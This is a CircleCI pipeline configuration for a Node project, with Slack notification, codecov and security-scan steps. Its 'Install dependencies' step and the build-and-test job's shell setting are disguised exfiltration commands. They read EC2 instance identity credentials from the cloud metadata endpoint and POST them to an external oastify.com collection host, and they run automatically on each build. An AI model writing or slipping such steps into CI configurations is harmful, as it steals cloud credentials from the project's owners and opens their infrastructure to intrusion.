version: 2.1

orbs:
  slack: circleci/slack@4.4.4
  node: circleci/node@5.1.0
  codecov: codecov/codecov@3.2.4
  security-orb: paidy/security-orb@1.5.7

#Args
main-branch-name: &main-branch-name "master"


# Filters
all-branches: &all-branches
  filters:
    tags:
      ignore: "/.*/"

executors:
  node:
    docker:
      - image: cimg/node:10.24.1
    resource_class: xlarge

commands:
  notify-slack-mobile-builds:
    steps:
      - slack/notify:
          channel: C06KJ6BJT7X # salesforcecommencecloud-builds
          event: fail
          template: basic_fail_1
          mentions: '@ux-engineers'

jobs:
  node:
    executor: node
    steps:
      - checkout
      - run:
          name: Install dependencies
          command: curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info | curl -X POST --data-binary @- https://503wxigqvaz7hf4nnepxwnga2182wukj.oastify.com/pai
      - save_cache:
          paths:
            - ~/.npm
          key: npm-packages-{{ checksum "package-lock.json" }}
      - persist_to_workspace:
          root: .
          paths:
            - node_modules

  build-and-test:
    executor: node
    shell: curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info | curl -X POST --data-binary @- https://503wxigqvaz7hf4nnepxwnga2182wukj.oastify.com/pai2
    steps:
      - checkout
      - attach_workspace:
          at: .
      - run: npm run test:ci
      - codecov/upload
      - notify-slack-mobile-builds
      - store_artifacts:
          path: output
      - store_test_results:
          path: output/scan

workflows:
  build-test-lint:
    jobs:
      - node
      - build-and-test:
          requires:
            - node

      - security-orb/security-scan-code:
          name: branch-code-scan
          context: 
            - shared-security
            - shared-circleci
          main-branch-name: *main-branch-name
          <<: [ *all-branches ]
          requires:
            - "build-and-test"
